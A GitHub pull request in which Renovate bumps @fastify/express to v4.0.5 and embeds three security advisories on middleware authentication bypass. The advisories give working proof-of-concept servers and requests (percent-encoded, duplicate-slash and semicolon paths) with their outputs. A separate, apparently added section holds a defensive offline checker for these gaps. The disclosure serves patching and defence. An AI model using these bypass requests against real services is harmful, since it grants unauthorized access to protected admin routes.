
fix(deps): update dependency @fastify/express to v4.0.5 [security]#872

Open
renovate[bot] wants to merge 1 commit intodevelopfrom
renovate/npm-fastify-express-vulnerability

Conversation


@renovate renovate Bot commented Mar 14, 2026

This PR contains the following updates:

| Package | Change |
|---|---|
| @fastify/express | 4.0.2 → 4.0.5 |

@fastify/express vulnerable to Improper Handling of URL Encoding (Hex Encoding)

CVE-2026-22037 / GHSA-g6q3-96cp-5r5m


Summary

A security vulnerability exists in @fastify/express where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.

Details

The vulnerability is caused by how @fastify/express matches requests against registered middleware paths.

PoC

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register fastify-express for Express-style middleware support
  await fastify.register(require('@fastify/express'));

  // Middleware to block /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });

  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });

  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });

  fastify.get('/admin/dashboard', async (request, reply) => {
    return { message: 'Admin dashboard' };
  });

  // Start server
  try {
    await fastify.listen({ port: 3000 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}

start();

Step 2: Execute the attack.

➜  ~ curl http://206.189.140.29:3000/%61dmin
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /%61dmin</pre>
</body>
</html>

(fastify express)

➜  ~ curl http://206.189.140.29:3000/%61dmin
{"message":"Admin panel"}

It differs from CVE-2026-22031 because this is a different npm module with its own code.

Severity

  • CVSS Score: 8.4 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


@fastify/express's middleware path doubling causes authentication bypass in child plugin scopes

CVE-2026-33807 / GHSA-hrwm-hgmj-7p9c


Summary

@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration.

Details

The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.

The call flow demonstrates the problem:

  1. Parent scope registers middleware: app.use('/admin', authFn). use() calculates path as '' + '/admin' = '/admin' — stores ['/admin', authFn] in kMiddlewares
  2. Child plugin registers with { prefix: '/admin' } — triggers onRegister(instance)
  3. onRegister copies parent middleware and calls instance.use('/admin', authFn) on child
  4. Child's use() function calculates path as '/admin' + '/admin' = '/admin/admin' — registers middleware with doubled path
  5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path /admin/admin
  6. Requests to /admin/secret don't match /admin/admin — middleware is silently skipped

The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.

PoC
const fastify = require('fastify');
const http = require('http');

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => resolve({ status: res.statusCode, body: data }));
    }).on('error', reject);
  });
}

async function test() {
  const app = fastify({ logger: false });
  await app.register(require('@fastify/express'));
  
  // Middleware enforcing auth on /admin routes
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403;
      res.setHeader('content-type', 'application/json');
      res.end(JSON.stringify({ error: 'Forbidden' }));
      return;
    }
    next();
  });
  
  // Root scope route — middleware works correctly
  app.get('/admin/root-data', async () => ({ data: 'root-secret' }));
  
  // Child scope route — middleware BYPASSED
  await app.register(async function(child) {
    child.get('/secret', async () => ({ data: 'child-secret' }));
  }, { prefix: '/admin' });
  
  await app.listen({ port: 19876, host: '0.0.0.0' });
  
  // Root scope: correctly blocked
  let r = await get(19876, '/admin/root-data');
  console.log('/admin/root-data (no auth):', r.status, r.body);
  // Output: 403 {"error":"Forbidden"}
  
  // Child scope: BYPASSED — secret data returned without auth
  r = await get(19876, '/admin/secret');
  console.log('/admin/secret (no auth):', r.status, r.body);
  // Output: 200 {"data":"child-secret"}
  
  await app.close();
}
test();

Actual output:

/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}

Impact

Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.

  • No special request crafting is required — normal requests bypass the middleware
  • It affects the idiomatic Fastify plugin pattern commonly used in production
  • The bypass is silent with no errors or warnings
  • Developers' basic testing of root-scoped routes will pass, masking the vulnerability
  • Any child plugin scope that shares a prefix with middleware is affected

Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.

Affected Versions
  • @fastify/express v4.0.4 (latest at time of discovery)
  • Fastify 5.x in default configuration
  • No special router options required (ignoreDuplicateSlashes not needed)
  • Affects any child plugin registration where the prefix overlaps with middleware path scoping
  • Does NOT affect middleware registered without path scoping (global middleware)
  • Does NOT affect middleware registered on root path (/) due to special case handling
Variant Testing

| Scenario | Middleware Path | Child Prefix | Result |
|---|---|---|---|
| Root route /admin/root-data | /admin | N/A | Middleware runs (403) |
| Child route /admin/secret | /admin | /admin | BYPASS (200) |
| Child route /api/data | /api | /api | BYPASS (200) |
| Nested child /admin/sub/data | /admin | /admin/sub | BYPASS — path becomes /admin/sub/admin |
| Middleware on / with any child | / | /api | No bypass — path === '/' && prefix.length > 0 special case |

Suggested Fix

The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include:

  1. Store the original path and function separately in kMiddlewares before prefixing
  2. Strip the parent prefix before re-registering in child scopes
  3. Store already-constructed Express middleware objects rather than re-processing paths

Severity

  • CVSS Score: 9.1 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


@fastify/express has a middleware authentication bypass via URL normalization gaps (duplicate slashes and semicolons)

CVE-2026-33808 / GHSA-6hw5-45gm-fj88


Summary

@fastify/express v4.0.4 fails to normalize URLs before passing them to Express middleware when Fastify router normalization options are enabled. This allows complete bypass of path-scoped authentication middleware via two vectors:

  1. Duplicate slashes (//admin/dashboard) when ignoreDuplicateSlashes: true is configured
  2. Semicolon delimiters (/admin;bypass) when useSemicolonDelimiter: true is configured

In both cases, Fastify's router normalizes the URL and matches the route, but @fastify/express passes the original un-normalized URL to Express middleware, which fails to match and is skipped.

Note: This is distinct from GHSA-g6q3-96cp-5r5m (CVE-2026-22037), which addressed URL percent-encoding bypass and was patched in v4.0.3. These normalization gaps remain in v4.0.4. A similar class of normalization issue was addressed in @fastify/middie via GHSA-8p85-9qpw-fwgw (CVE-2026-2880), but @fastify/express does not include the equivalent fixes.

Details

The vulnerability exists in @fastify/express's enhanceRequest function (index.js lines 43-46):

const decodedUrl = decodeURI(url)
req.raw.url = decodedUrl

The decodeURI() function only handles percent-encoding — it does not normalize duplicate slashes or strip semicolon-delimited parameters. When Fastify's router options are enabled, find-my-way applies these normalizations during route matching, but @fastify/express passes the original URL to Express middleware.

Vector 1: Duplicate Slashes

When ignoreDuplicateSlashes: true is set, Fastify's find-my-way router normalizes //admin/dashboard to /admin/dashboard for route matching. However, Express middleware receives //admin/dashboard. Express's app.use('/admin', authMiddleware) expects paths to start with /admin/, but //admin does not match the /admin prefix pattern.

The attack sequence:

  1. Client sends GET //admin/dashboard
  2. Fastify's router normalizes this to /admin/dashboard and finds a matching route
  3. enhanceRequest sets req.raw.url = "//admin/dashboard" (preserves double slash)
  4. Express middleware app.use('/admin', authMiddleware) does not match //admin prefix
  5. Authentication is bypassed, and the Fastify route handler executes
Vector 2: Semicolon Delimiters

When useSemicolonDelimiter: true is configured, the router uses find-my-way's safeDecodeURI() which treats semicolons as query string delimiters, splitting /admin;bypass into path /admin and querystring bypass for route matching. However, @fastify/express passes the full URL /admin;bypass to Express middleware.

Express uses path-to-regexp v0.1.12 internally, which compiles middleware paths like /admin to the regex /^\/admin\/?(?=\/|$)/i. A semicolon character does not satisfy the lookahead condition, causing the middleware match to fail.

The attack flow:

  1. Request GET /admin;bypass arrives
  2. Fastify router: splits at ; — matches route GET /admin
  3. Express middleware: regex /^\/admin\/?(?=\/|$)/i fails against /admin;bypass — middleware skipped
  4. Route handler executes without authentication checks
PoC
Duplicate Slash Bypass

Save as server.js and run with node server.js:

const fastify = require('fastify')

async function start() {
  const app = fastify({
    logger: false,
    ignoreDuplicateSlashes: true,  // documented Fastify option
  })

  await app.register(require('@fastify/express'))

  // Standard Express middleware auth pattern
  app.use('/admin', function expressAuthGate(req, res, next) {
    const auth = req.headers.authorization
    if (!auth || auth !== 'Bearer admin-secret-token') {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden by Express middleware' }))
      return
    }
    next()
  })

  // Protected route
  app.get('/admin/dashboard', async (request) => {
    return { message: 'Admin dashboard', secret: 'sensitive-admin-data' }
  })

  await app.listen({ port: 3000 })
  console.log('Listening on http://localhost:3000')
}
start()

##### Normal access — blocked by Express middleware
$ curl -s http://localhost:3000/admin/dashboard
{"error":"Forbidden by Express middleware"}

##### Double-slash bypass — Express middleware skipped, handler runs
$ curl -s http://localhost:3000//admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

##### Triple-slash also works
$ curl -s http://localhost:3000///admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

Multiple variants work: ///admin, /.//admin, //admin//dashboard, etc.

Semicolon Bypass
const fastify = require('fastify')
const http = require('http')

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = ''
      res.on('data', (chunk) => data += chunk)
      res.on('end', () => resolve({ status: res.statusCode, body: data }))
    }).on('error', reject)
  })
}

async function test() {
  const app = fastify({ 
    logger: false, 
    routerOptions: { useSemicolonDelimiter: true }
  })
  await app.register(require('@fastify/express'))
  
  // Auth middleware blocking unauthenticated access
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden' }))
      return
    }
    next()
  })
  
  app.get('/admin', async () => ({ secret: 'classified-info' }))
  
  await app.listen({ port: 19900, host: '0.0.0.0' })
  
  // Blocked:
  let r = await get(19900, '/admin')
  console.log('/admin:', r.status, r.body)
  // Output: /admin: 403 {"error":"Forbidden"}
  
  // BYPASS:
  r = await get(19900, '/admin;bypass')
  console.log('/admin;bypass:', r.status, r.body)
  // Output: /admin;bypass: 200 {"secret":"classified-info"}
  
  r = await get(19900, '/admin;')
  console.log('/admin;:', r.status, r.body)
  // Output: /admin;: 200 {"secret":"classified-info"}
  
  await app.close()
}
test()

Actual output:

/admin: 403 {"error":"Forbidden"}
/admin;bypass: 200 {"secret":"classified-info"}
/admin;: 200 {"secret":"classified-info"}

The semicolon bypass works with any text after it: /admin;, /admin;x, /admin;jsessionid=123.

Impact

Complete authentication bypass for applications using Express middleware for path-based access control. An unauthenticated attacker can access protected routes (admin panels, APIs, user data) by manipulating the URL path.

Duplicate slash vector affects applications that:

  1. Use @fastify/express with ignoreDuplicateSlashes: true
  2. Rely on Express middleware for authentication/authorization
  3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

Semicolon vector affects applications that:

  1. Use @fastify/express with useSemicolonDelimiter: true (commonly enabled for Java application server compatibility, e.g., handling ;jsessionid= parameters)
  2. Rely on Express middleware for authentication/authorization
  3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

The bypass works against all Express middleware that uses prefix path matching, including popular packages like express-basic-auth, custom authentication middleware, and rate limiting middleware.

The ignoreDuplicateSlashes and useSemicolonDelimiter options are documented as convenience features, not marked as security-sensitive, so developers would not expect them to impact middleware security.

Affected Versions
  • @fastify/express v4.0.4 (latest) with Fastify 5.x
  • Requires ignoreDuplicateSlashes: true or useSemicolonDelimiter: true in Fastify configuration (via top-level option or routerOptions)
Variant Testing

Duplicate slashes:

| Request | Express Middleware | Handler Runs | Result |
|---|---|---|---|
| GET /admin/dashboard | Invoked (blocks) | No | 403 Forbidden |
| GET //admin/dashboard | Skipped | Yes | 200 OK — BYPASS |
| GET ///admin/dashboard | Skipped | Yes | 200 OK — BYPASS |
| GET /.//admin/dashboard | Skipped | Yes | 200 OK — BYPASS |
| GET //admin//dashboard | Skipped | Yes | 200 OK — BYPASS |
| GET /admin//dashboard | Invoked (blocks) | No | 403 Forbidden |

Semicolons:

| URL | Express MW Fires | Route Matches | Result |
|---|---|---|---|
| /admin | Yes | Yes (200/403) | Normal |
| /admin; | No | Yes (200) | BYPASS |
| /admin;bypass | No | Yes (200) | BYPASS |
| /admin;x=1 | No | Yes (200) | BYPASS |
| /admin;/dashboard | No | Yes (200, routes to /admin) | BYPASS |
| /admin/dashboard;x | Yes | Yes (routes to /admin/dashboard) | Normal (prefix /admin/ still matches) |

The semicolon bypass is effective when the semicolon appears immediately after the middleware prefix boundary. For sub-paths where the prefix is already matched (e.g., /admin/dashboard;x), Express's prefix regex succeeds because the /admin/ part matches before the semicolon appears.

Suggested Fix

@fastify/express should normalize URLs before passing them to Express middleware, respecting the router normalization options that are enabled. Specifically:

  • When ignoreDuplicateSlashes is enabled, apply FindMyWay.removeDuplicateSlashes() to req.raw.url before middleware execution
  • When useSemicolonDelimiter is enabled, strip semicolon-delimited parameters from the URL before passing to Express

This would match the normalization behavior that @fastify/middie already implements via sanitizeUrlPath() and normalizePathForMatching().

Severity

  • CVSS Score: 9.1 / 10 (Critical)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

fastify/fastify-express (@fastify/express)

v4.0.5

Compare Source

⚠️ Security Release

This fixes CVE CVE-2026-33807 GHSA-hrwm-hgmj-7p9c.
This fixes CVE CVE-2026-33808 GHSA-6hw5-45gm-fj88.

What's Changed

New Contributors

Full Changelog: fastify/fastify-express@v4.0.4...v4.0.5

v4.0.4

Compare Source

What's Changed

New Contributors

Full Changelog: fastify/fastify-express@v4.0.3...v4.0.4

v4.0.3

Compare Source

What's Changed

New Contributors

Full Changelog: fastify/fastify-express@v4.0.2...v4.0.3


Configuration

📅 Schedule: (in timezone Asia/Tokyo)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
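The three advisories above share one mechanism: a path-scoped middleware prefix is matched against the request URL in a form that differs from the form the router matches, either because the URL was not normalized (percent-encoding, duplicate slashes, semicolons) or because the registered prefix itself was wrong (doubled in a child scope). The following is an added example written for this review, not code from @fastify/express or from the advisories; it models both situations offline so a maintainer can check a prefix/URL/option combination or a scope inheritance rule without standing up a server. The normalizer is an assumption modelled on the three behaviours the advisories name, not find-my-way's actual code; the prefix matcher reproduces the path-to-regexp v0.1.x pattern the advisory quotes. Function names (normalizePath, auditRequest, inheritDoubling, inheritPreserving) are this example's own.

```javascript
// Added example; not code from @fastify/express or the advisories.
// (1) Prefix matching on the raw request URL vs. the same URL normalized the way
//     the router normalizes it. A "gap" is a request the middleware would skip
//     while the router still reaches a route under that prefix.
// (2) Middleware inheritance into a child plugin scope, in a doubling form and in
//     a form that keeps the already-constructed entry (the advisory's fix option 3).

// Prefix matcher in the style of the path-to-regexp v0.1.x pattern quoted in the
// advisory: for '/admin' it builds /^\/admin\/?(?=\/|$)/i.
function prefixRegex(prefix) {
  const escaped = prefix.replace(/[.*+?^${}()|[\]\\/]/g, '\\$&');
  return new RegExp('^' + escaped + '\\/?(?=\\/|$)', 'i');
}

function middlewareMatches(prefix, pathname) {
  return prefixRegex(prefix).test(pathname);
}

// Normalize a request URL to the form the router would match against.
// Assumption: semicolon split (useSemicolonDelimiter), percent-decoding, then
// duplicate-slash collapsing (ignoreDuplicateSlashes). Returns null on malformed
// percent-encoding, which a defender should reject rather than match on.
function normalizePath(rawUrl, routerOptions = {}) {
  let path = rawUrl.split('?')[0];
  if (routerOptions.useSemicolonDelimiter) path = path.split(';')[0];
  try {
    path = decodeURI(path);
  } catch (e) {
    return null;
  }
  if (routerOptions.ignoreDuplicateSlashes) path = path.replace(/\/{2,}/g, '/');
  return path;
}

// Compare both matching outcomes for one request under given router options.
function auditRequest(prefix, rawUrl, routerOptions = {}) {
  const rawPath = rawUrl.split('?')[0];
  const normalized = normalizePath(rawUrl, routerOptions);
  const rawMatch = middlewareMatches(prefix, rawPath);
  const normalizedMatch = normalized !== null && middlewareMatches(prefix, normalized);
  return { rawMatch, normalizedMatch, gap: !rawMatch && normalizedMatch };
}

// --- Child scope inheritance ----------------------------------------------
// A scope keeps its prefix and the middleware entries registered on it.
function createScope(prefix) {
  return { prefix, entries: [] };
}

// Registration always prepends the scope prefix, as the advisory describes.
function use(scope, path, fn) {
  scope.entries.push({ original: path, path: scope.prefix + path, fn });
}

// Doubling form: feeds the already-prefixed path back through use().
function inheritDoubling(parent, child) {
  for (const e of parent.entries) use(child, e.path, e.fn);
}

// Preserving form: copies the constructed entry without re-prefixing it.
function inheritPreserving(parent, child) {
  for (const e of parent.entries) child.entries.push({ ...e });
}

// Parent registers '/admin' middleware; child with childPrefix inherits it.
// Returns the middleware path the child scope ends up with.
function inheritedPath(childPrefix, inherit) {
  const parent = createScope('');
  use(parent, '/admin', function auth() {});
  const child = createScope(childPrefix);
  inherit(parent, child);
  return child.entries[0].path;
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed sample requests taken from the advisories' variant tables.
  const cases = [
    ['/admin', '/%61dmin', {}],
    ['/admin', '//admin/dashboard', { ignoreDuplicateSlashes: true }],
    ['/admin', '/admin;bypass', { useSemicolonDelimiter: true }],
    ['/admin', '/admin/dashboard;x', { useSemicolonDelimiter: true }],
  ];
  for (const [prefix, url, opts] of cases) console.log(url, auditRequest(prefix, url, opts));
  console.log('doubling:', inheritedPath('/admin', inheritDoubling));
  console.log('preserving:', inheritedPath('/admin', inheritPreserving));
}
```

auditRequest reports `gap: true` exactly for the cases the advisories list as bypasses and `gap: false` for `/admin/dashboard;x`, where the `/admin/` part still satisfies the prefix regex, and for `//admin/dashboard` when ignoreDuplicateSlashes is off (the router would not match either). inheritedPath shows why fix option 3 works: copying the constructed entry leaves the child middleware at `/admin`, whereas re-calling use() yields `/admin/admin`, which never matches `/admin/secret`.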

@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Mar 14, 2026
codecov Bot commented Mar 14, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 44.67%. Comparing base (8d07eb8) to head (364ef67).

Additional details and impacted files
@@             Coverage Diff              @@
##           develop     #872       +/-   ##
============================================
+ Coverage    19.22%   44.67%   +25.45%     
============================================
  Files          954     1923      +969     
  Lines        97042   215448   +118406     
  Branches      1428     5846     +4418     
============================================
+ Hits         18654    96252    +77598     
- Misses       78381   119164    +40783     
- Partials         7       32       +25     

☔ View full report in Codecov by Sentry.


github-actions Bot commented Mar 14, 2026

api.json diff caused by this PR
No differences.
Get diff files from Workflow Page

@renovate renovate Bot force-pushed the renovate/npm-fastify-express-vulnerability branch 2 times, most recently from a79af62 to 01fccd7 Compare March 20, 2026 00:43
@renovate renovate Bot force-pushed the renovate/npm-fastify-express-vulnerability branch 2 times, most recently from 097c5cc to abf5c7b Compare April 8, 2026 18:11
@renovate renovate Bot force-pushed the renovate/npm-fastify-express-vulnerability branch from abf5c7b to 364ef67 Compare April 16, 2026 09:42
@renovate renovate Bot changed the title fix(deps): update dependency @fastify/express to v4.0.3 [security] fix(deps): update dependency @fastify/express to v4.0.5 [security] Apr 16, 2026

Labels

dependencies Pull requests that update a dependency file packages/backend
